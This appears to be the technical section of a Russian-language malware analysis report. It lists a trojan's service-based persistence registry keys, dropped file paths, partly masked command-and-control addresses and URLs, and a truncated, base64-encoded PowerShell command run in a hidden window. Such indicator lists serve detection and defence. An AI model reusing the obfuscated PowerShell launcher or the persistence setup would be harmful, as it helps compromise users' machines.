Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\amxread] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\amxread] 'ImagePath' = '"%WINDIR%\SysWOW64\api-ms-win-core-xstate-l1-1-0\amxread.exe"'
- 'amxread' "%WINDIR%\SysWOW64\api-ms-win-core-xstate-l1-1-0\amxread.exe"
- 'amxread' %WINDIR%\SysWOW64\api-ms-win-core-xstate-l1-1-0\amxread.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGUAXwBtAHYAeQB0AD0AKAAoACcARwAnACsAJwB5ADgAXwAnACkAKwAoACcAYwA2ACcAKwAnAHMAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAE4AdgA6AHUAUwBlAHIAUAByAE8AZgBJAGwAZQBcAE...
- %HOMEPATH%\elxmqaf\vo4x6l2\mbt8k3dl.exe
- %WINDIR%\syswow64\api-ms-win-core-xstate-l1-1-0\amxread.exe
- %HOMEPATH%\elxmqaf\vo4x6l2\mbt8k3dl.exe в %WINDIR%\syswow64\api-ms-win-core-xstate-l1-1-0\amxread.exe
- '11#.#10.236.121':8080
- http://st#####osenbusch.com/_/ynWT/
- http://11#.###.236.121:8080/YXDjU/8wdTFCAqGNrUHDvMPr/ww6SvjFp9D16k88AfSB/MiXYHFn/eYuK0VHLfHanj/rS3XRrF/ via 11#.#10.236.121
- DNS ASK st#####osenbusch.com
- '%HOMEPATH%\elxmqaf\vo4x6l2\mbt8k3dl.exe'
- '%WINDIR%\syswow64\api-ms-win-core-xstate-l1-1-0\amxread.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGUAXwBtAHYAeQB0AD0AKAAoACcARwAnACsAJwB5ADgAXwAnACkAKwAoACcAYwA2ACcAKwAnAHMAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAE4AdgA6AHUAUwBlAHIAUAByAE8AZgBJAGwAZQBcAE...' (со скрытым окном)